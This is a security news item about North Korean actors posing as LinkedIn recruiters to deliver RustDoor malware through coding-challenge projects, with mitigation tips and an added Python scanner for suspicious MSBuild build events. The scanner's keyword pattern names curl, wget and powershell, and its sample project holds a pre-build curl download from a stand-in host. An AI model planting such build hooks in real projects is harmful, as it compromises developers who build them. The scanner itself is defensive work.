North Korean hackers spread RustDoor Malware on LinkedIn

North Korean hackers are targeting LinkedIn users with advanced malware called RustDoor. This highlights the growing use of social engineering by state-sponsored groups, particularly from North Korea, on professional networking sites.

North Korean hackers are exploiting LinkedIn by posing as recruiters and HR professionals to target users.

Jamf Threat Labs reports that attackers create fake profiles mimicking real tech companies to offer job opportunities, bypassing initial skepticism.

Attackers target individuals in cryptocurrency and tech sectors by reviewing their social media activity. They initiate conversations, eventually leading to the delivery of malicious software, exploiting trust in professional networking.

RustDoor Malware

The attacks use RustDoor malware, often disguised as coding challenges or pre-employment tests. Victims receive seemingly legitimate projects, like Visual Studio tasks, which contain hidden malicious scripts that activate when the project is built.

These scripts download extra payloads from remote servers, embedding themselves deeply in the victim’s system. RustDoor malware functions as both an infostealer and backdoor, capable of downloading and uploading files, executing commands, and prompting users for passwords while posing as legitimate apps like Visual Studio.
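Because the scripts described above run when the project is built, a received "coding challenge" can be inspected first by listing every command its MSBuild project file would run at build time. The following is an added example, not code from the original article or from Jamf Threat Labs. The element names are standard MSBuild; the keyword pattern and the sample project are constructed for illustration and are not indicators from this campaign.

```python
import re
import xml.etree.ElementTree as ET

# Standard MSBuild elements whose content runs as a shell command during a build.
BUILD_EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}
# Heuristic keywords (assumed for this example; not indicators from the report).
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|pwsh|bash|sh|osascript|chmod|base64)\b|https?://", re.I)

def local(tag):
    """Drop the XML namespace that MSBuild project files usually declare."""
    return tag.rsplit("}", 1)[-1]

def build_commands(project_xml):
    """Return (element, command) for every command the project runs at build time."""
    found = []
    for elem in ET.fromstring(project_xml).iter():
        name = local(elem.tag)
        if name in BUILD_EVENT_TAGS:
            # .csproj keeps the command as text; .vcxproj nests it in <Command>.
            text = " ".join(t.strip() for t in elem.itertext() if t.strip())
            if text:
                found.append((name, text))
        elif name == "Exec" and elem.get("Command"):
            found.append(("Exec", elem.get("Command").strip()))
    return found

def review(project_xml):
    """Split build-time commands into (needs manual review, other)."""
    flagged, other = [], []
    for name, cmd in build_commands(project_xml):
        (flagged if SUSPICIOUS.search(cmd) else other).append((name, cmd))
    return flagged, other

# Constructed sample project file (not taken from the campaign).
SAMPLE = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>curl -s https://example.invalid/file -o /tmp/file</PreBuildEvent>
    <PostBuildEvent>echo build finished</PostBuildEvent>
  </PropertyGroup>
  <Target Name="AfterBuild">
    <Exec Command="dotnet format --verify-no-changes" />
  </Target>
</Project>"""

if __name__ == "__main__":
    flagged, other = review(SAMPLE)
    for name, cmd in flagged:
        print(f"REVIEW {name}: {cmd}")
```

A flagged command is a prompt for manual review rather than a verdict, and an empty result does not clear a project, since build logic can also live in imported files.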

[Figure: Comparison of configuration]

Mitigation and Response

  • Increased Attack Sophistication: The campaign highlights the need for strong cybersecurity and awareness training.
  • Educate Employees: Warn staff about risks from unsolicited contacts on LinkedIn and other social media.
  • Verify Offers: Check the legitimacy of job offers and software requests before acting.
  • Strengthen Defenses: Regularly update security software and systems. Use tools to detect unusual network activity.
  • Focus on Cryptocurrency Sector: Companies in this sector should be extra cautious due to higher risks.
  • State-Sponsored Threats: North Korean actors use sophisticated social engineering techniques.
  • Stay Vigilant: Be proactive in cybersecurity practices to effectively manage and mitigate threats.

2024-09-18T08:02:30+05:30 | September 17th, 2024 | malicious cyber actors, Malware, Security Advisory, Security Update

About the Author:

FirstHackersNews - Identifies Security
